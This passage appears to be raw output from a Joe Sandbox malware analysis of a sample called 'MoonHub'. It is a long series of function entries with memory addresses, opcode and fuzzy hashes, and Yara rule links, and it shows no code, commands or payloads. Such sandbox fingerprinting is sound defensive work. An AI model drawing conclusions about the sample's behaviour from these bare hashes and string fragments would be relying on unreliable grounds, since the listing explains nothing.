                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f47a4d08ee57f71183c7d74c246c8a9ef26274bb0733184b51c747aeeb7163c4
                                                                                                                                                                                • Instruction ID: 72fae642a5f5ac8027b3694a838cdfcb02930048fd3635c0f41958f42b955b7e
                                                                                                                                                                                • Opcode Fuzzy Hash: f47a4d08ee57f71183c7d74c246c8a9ef26274bb0733184b51c747aeeb7163c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 34D02332D2EC41CEDA48B7340C9701439E0BB65314FE40294E03CC32E1ED1C4443C306
                                                                                                                                                                                Function 00007FF848EA617A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 960ef314ad412b3b7c79bcd3e228eca7a00ea9575b9a49e923ed807fb2d07b53
                                                                                                                                                                                • Instruction ID: daf6b172f6d39dd46095b80b332f48b0026f46fa427212e67a40e3e872138c61
                                                                                                                                                                                • Opcode Fuzzy Hash: 960ef314ad412b3b7c79bcd3e228eca7a00ea9575b9a49e923ed807fb2d07b53
                                                                                                                                                                                • Instruction Fuzzy Hash: 68C01263E4CB06CEEA90E954B4015F9B7C0FBA1B90F8000A5D41943156EF3A655A4645
                                                                                                                                                                                Function 00007FF848EA539A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19f352dd794dd9acf247597bf28512fc3a4a2150728eec1070f5cf4c9f1ba5da
                                                                                                                                                                                • Instruction ID: 4bfe2ec5b5627087c4e92b98669dba0158bfc93902108a3732e58d654dfca93a
                                                                                                                                                                                • Opcode Fuzzy Hash: 19f352dd794dd9acf247597bf28512fc3a4a2150728eec1070f5cf4c9f1ba5da
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AC01222D4CA0A4FFBA1A998F4415FDA791FBA0B90F50017AD1044219ADF396547C689
                                                                                                                                                                                Function 00007FF848EA6B5A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42304ba2587d695149edb394b8d62478cf12457d7a6924d9746d288f9a6625de
                                                                                                                                                                                • Instruction ID: 07d2d8abebad0aca5a10fa9f6349277489a35ed868764c65e3f60ce66a5c61db
                                                                                                                                                                                • Opcode Fuzzy Hash: 42304ba2587d695149edb394b8d62478cf12457d7a6924d9746d288f9a6625de
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BD01221E0CB1A8EEB91A998A441AFD77D0FFE1791F80017A900546156DF3851468AC9
                                                                                                                                                                                Function 00007FF848EA74A7 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d1ae938dc8e4606c70e5221219bde18b6edba57d0df3f0fd5e01599d3ca1b21
                                                                                                                                                                                • Instruction ID: 337f770d057e245830c27ef859b552996fa7ed7bb3342e0c7b39fc09891d2e43
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d1ae938dc8e4606c70e5221219bde18b6edba57d0df3f0fd5e01599d3ca1b21
                                                                                                                                                                                • Instruction Fuzzy Hash: E9C02235D0CA0E4FD6A19584A4010BA37A1FBA0AA0F000229E404A2086FF3808828A80
                                                                                                                                                                                Function 00007FF848E9F5C7 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 35f3ed918e9e8c77a2b26c4b690a8d38bd85b0615ec24b3c63818c47661ccb07
                                                                                                                                                                                • Instruction ID: 14604880ef2ffe24d66052b90dcd200e450dce3835f15c8379b58caa734f0576
                                                                                                                                                                                • Opcode Fuzzy Hash: 35f3ed918e9e8c77a2b26c4b690a8d38bd85b0615ec24b3c63818c47661ccb07
                                                                                                                                                                                • Instruction Fuzzy Hash: 66C01272D1C54A9FF7856AE4A4410FA3351FB90754F50073EE549821C6DF7855438644
                                                                                                                                                                                Function 00007FF848EA2E1A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eaf16fc7d097f0d68e61e13dec6fdf85ca7b24a99be45b482d88206924821b58
                                                                                                                                                                                • Instruction ID: 19c1dfaf4a1747628dd251ecd268bcb8dbdef61a65d291b438b30c75cfc1fb54
                                                                                                                                                                                • Opcode Fuzzy Hash: eaf16fc7d097f0d68e61e13dec6fdf85ca7b24a99be45b482d88206924821b58
                                                                                                                                                                                • Instruction Fuzzy Hash: E1D0C971E4C6164EEBA3A954A4919B96390BBA0780F500179944986186EF78918BC685
                                                                                                                                                                                Function 00007FF848EA9914 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c4808516cdd90e3c105e02383ea16028ce46acf209d76aef115cbdd844e9c6a
                                                                                                                                                                                • Instruction ID: 58e45c2517e635198c5f1f9293af756e72f10c8316b8430415abd5925c222221
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c4808516cdd90e3c105e02383ea16028ce46acf209d76aef115cbdd844e9c6a
                                                                                                                                                                                • Instruction Fuzzy Hash: E4C04C01B1CA290AE55475DC78411A85281A784964B541677D51BC1299CD2A588101C5
                                                                                                                                                                                Function 00007FF848EA9904 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 24e3fe822194e8bcf3fb819ded516a6da0c6f29cd40de828b4c242c3e240e6d1
                                                                                                                                                                                • Instruction ID: eaf9d93f5e42cc59e9441a4c41fdc4ec15d87d5e7724fbca5720022bef22fd05
                                                                                                                                                                                • Opcode Fuzzy Hash: 24e3fe822194e8bcf3fb819ded516a6da0c6f29cd40de828b4c242c3e240e6d1
                                                                                                                                                                                • Instruction Fuzzy Hash: AAC04C05B1CA290AE55075DC78411A85281A7849A4B941677D51BC1299DD2A584101C5
                                                                                                                                                                                Function 00007FF848EA98F4 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d14a0ea0eab9640bdbb3d160bea75b020ac9cebc4b3ed69b4fe68689f74a6566
                                                                                                                                                                                • Instruction ID: 5e14d8c628bff27a74ac85a5aca76196e1161178f9e34486add1f311bcde861b
                                                                                                                                                                                • Opcode Fuzzy Hash: d14a0ea0eab9640bdbb3d160bea75b020ac9cebc4b3ed69b4fe68689f74a6566
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C08C01B1CA290AE150708C78011A85281A7C4960B180277D01AC1289CC29588101C5
                                                                                                                                                                                Function 00007FF848EA99D0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6eb120be28984effc787b3233c1187d5027b990d21b2d7b6b6233340cfd5a3cc
                                                                                                                                                                                • Instruction ID: 5dcf05318863fecc3acbdf7e3f4959106784f1710334cc2948348a1815e2b68e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6eb120be28984effc787b3233c1187d5027b990d21b2d7b6b6233340cfd5a3cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 54C02220A0AC2C0E02A8B02C2808A3A00CACBCCA20B0C02ABA00CC3288CC200C0203C0
                                                                                                                                                                                Function 00007FF848EA3CCA Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ed05916992812914758ee4b9a33dfb3b862f6c1ed102fac388142267aa228e21
                                                                                                                                                                                • Instruction ID: ca1e786ae54081bbb919604b86a1241391d6f76dddea6f4c6edff456fd6eba85
                                                                                                                                                                                • Opcode Fuzzy Hash: ed05916992812914758ee4b9a33dfb3b862f6c1ed102fac388142267aa228e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 08C01212D5C7061AE694621CB4456BA17C0FBA0790F540021D005C124AED2951864545
                                                                                                                                                                                Function 00007FF848E93F43 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 817f92492b7623f2a42f568c97608e9a5b04c34229763ba6badb52907e0a8726
                                                                                                                                                                                • Instruction ID: 91fcbb5bb9140c4dda11a79cd53a5258d1283c5806f50bb910c8d09220cf5790
                                                                                                                                                                                • Opcode Fuzzy Hash: 817f92492b7623f2a42f568c97608e9a5b04c34229763ba6badb52907e0a8726
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C0123242C9455BD741B700E4418EB7351FFD0700F801B39F06A4109ADD6966448682
                                                                                                                                                                                Function 00007FF848EA6E10 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12ba4a09bc2c3a8669c703598181b9cf4b207def8ef80c26bc497b19e0a8df0c
                                                                                                                                                                                • Instruction ID: 8ba415d772b0fcc28fe76b9c4ee4ac7187a1ed4042f39f2cd560cba7583ac0c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 12ba4a09bc2c3a8669c703598181b9cf4b207def8ef80c26bc497b19e0a8df0c
                                                                                                                                                                                • Instruction Fuzzy Hash: C4B09227A4D30A99EA10A084B8020FDB390EB806B6F220273EA4D914414B2A21694185
                                                                                                                                                                                Function 00007FF848EA3F80 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                                                                                                                                                                                • Instruction ID: 0aee816a65a0aaf9e9fd370457603136d0edb5f4e6a87afca3e8c0e673e8446f
                                                                                                                                                                                • Opcode Fuzzy Hash: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                                                                                                                                                                                • Instruction Fuzzy Hash: C3B09227A4D10A89EA203089B4020FDF314FB90AFAF600233D20D814418A2721254185
                                                                                                                                                                                Function 00007FF848EA09E9 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                                                                                                                                                • Instruction ID: 457d305e8618976b4ed70ae3bd3011bfc075f63115298d6095b4316089a549aa
                                                                                                                                                                                • Opcode Fuzzy Hash: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                                                                                                                                                • Instruction Fuzzy Hash: 09B01237A4D1098C9E10208474010FDF310F781176F500133C70D910004692142505C0
                                                                                                                                                                                Function 00007FF848E98243 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7966602ffe50edbbe61c749f106fcd4e6c0dc95706f4d67165916a74d2a60024
                                                                                                                                                                                • Instruction ID: 06055c792f280dae0b33604450282fcda99dbbc7237319e500e7804bab5108b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 7966602ffe50edbbe61c749f106fcd4e6c0dc95706f4d67165916a74d2a60024
                                                                                                                                                                                • Instruction Fuzzy Hash: 66B01233B4241D45EB0065D8B4012FDB314DB81361F011533E22CC1042995A142401D1
                                                                                                                                                                                Function 00007FF848E9F76A Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                                                                                                                • Instruction ID: 7f9a10d5978b695ba48ed7c42b40188750d92b3b0a158b006b69284450f16054
                                                                                                                                                                                • Opcode Fuzzy Hash: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                                                                                                                • Instruction Fuzzy Hash: 00A02233CA880C8ACF200880B8000F83300FB00208F208023EC0E020008BB222308080
                                                                                                                                                                                Function 00007FF848EAC308 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fd12d00f715f772d4e717d149e88eff78111f64edad32d639de6ad1961ec71ab
                                                                                                                                                                                • Instruction ID: 56c386b8068ecd579b7ebe3fb19c20d78295211e2f221140ae8b976da2518762
                                                                                                                                                                                • Opcode Fuzzy Hash: fd12d00f715f772d4e717d149e88eff78111f64edad32d639de6ad1961ec71ab
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 00007FF848EA15F0 Relevance: .0, Instructions: 1COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7c15174413ed29de7dfbc2fe842a2d3833f7018e864b60b295d68bace48c9ff7
                                                                                                                                                                                • Instruction ID: d21d374c54a9c4a39c4880cf1f515b5163eca1b9269caa959385e48f727c9a0a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c15174413ed29de7dfbc2fe842a2d3833f7018e864b60b295d68bace48c9ff7
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 00007FF848EA1628 Relevance: .0, Instructions: 1COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 61ed3db3027bc01efcb214f7c0a3ea1f25e6a883cde4da9e31d9ffa778c61078
                                                                                                                                                                                • Instruction ID: 0f20771d72e16f9ac1c3793dca2399d626a9d2e8fd73a2077aa5d63e2a516766
                                                                                                                                                                                • Opcode Fuzzy Hash: 61ed3db3027bc01efcb214f7c0a3ea1f25e6a883cde4da9e31d9ffa778c61078
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 00007FF848EA1618 Relevance: .0, Instructions: 1COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bb5d82de9eeea4025255a4238c638a3c90b34d87bd4287b8d1b5b6327042c923
                                                                                                                                                                                • Instruction ID: 23202173d34706c3c9ed58b40e70c1a951f2a08a14d71288618fda2a0a88a82f
                                                                                                                                                                                • Opcode Fuzzy Hash: bb5d82de9eeea4025255a4238c638a3c90b34d87bd4287b8d1b5b6327042c923
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 00007FF848E968D6 Relevance: 17.8, Strings: 14, Instructions: 281COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: :=j$(:=j$(c=j$0:=j$8:=j$@:=j$H:=j$P:=j$X:=j$`:=j$h:=j$p:=j$9=j$9=j
                                                                                                                                                                                • API String ID: 0-507810205
                                                                                                                                                                                • Opcode ID: 299501dc18cb525af80d554771b6098847c667bcc3df8ce9b4f6c85b8036613c
                                                                                                                                                                                • Instruction ID: 9cc18aaf2c9de4c0e59b82c6c6fbe76ce719195b7c20f0e6d3f42b49a59a85d1
                                                                                                                                                                                • Opcode Fuzzy Hash: 299501dc18cb525af80d554771b6098847c667bcc3df8ce9b4f6c85b8036613c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FB1737054EA89BFC34DA3B45C13ECAFAA0EF02250F2946F9E0459F4A3DA5C0844CB65
                                                                                                                                                                                Function 00007FF848E963F8 Relevance: 16.6, Strings: 13, Instructions: 369COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9=j$(9=j$09=j$89=j$@9=j$H9=j$P8=j$P9=j$h8=j$p8=j$x8=j$8=j$8=j
                                                                                                                                                                                • API String ID: 0-1595202763
                                                                                                                                                                                • Opcode ID: 96bf53fdd1074a60783c5b6da6a09ad884261db2a90f9c756f6de93411ee7f5e
                                                                                                                                                                                • Instruction ID: 0004a0bbf3673808466eafeb4ff6fdfdedf9e2dc5e65c239ee1b6805b3551ffc
                                                                                                                                                                                • Opcode Fuzzy Hash: 96bf53fdd1074a60783c5b6da6a09ad884261db2a90f9c756f6de93411ee7f5e
                                                                                                                                                                                • Instruction Fuzzy Hash: B3C1C86580FBC5BFC74667B818569CABFE0DF13294B1406FFE045AB0A3DE9C58098725
                                                                                                                                                                                Function 00007FF848E969F1 Relevance: 15.2, Strings: 12, Instructions: 187COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: :=j$(:=j$(c=j$0:=j$8:=j$@:=j$H:=j$P:=j$X:=j$`:=j$h:=j$p:=j
                                                                                                                                                                                • API String ID: 0-3011821929
                                                                                                                                                                                • Opcode ID: 592c941f48526dd648364da87c235f48d413a8514ef8be7666159230a59c3d96
                                                                                                                                                                                • Instruction ID: 9c51e1dc8348b8dbf423004e3040d407300d3993dddcf0fc2d496b5c6599598d
                                                                                                                                                                                • Opcode Fuzzy Hash: 592c941f48526dd648364da87c235f48d413a8514ef8be7666159230a59c3d96
                                                                                                                                                                                • Instruction Fuzzy Hash: 3361747054EA89BFC74DE7B45C12ACAFAA0FF02250F2947F9E0459F4A3DA5C0885CB65
                                                                                                                                                                                Function 00007FF848E9646A Relevance: 12.9, Strings: 10, Instructions: 355COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9=j$(9=j$09=j$89=j$@9=j$H9=j$P8=j$P9=j$8=j$8=j
                                                                                                                                                                                • API String ID: 0-1212959903
                                                                                                                                                                                • Opcode ID: 66d4554c141e0481f952850f2dc9c65769ade8e6777f23bfbcb92a4b1dab0cfb
                                                                                                                                                                                • Instruction ID: c4f42cc1dbf99b42c3858d23a83d9bdfa8e4658fe736852152d6cef22f4abeba
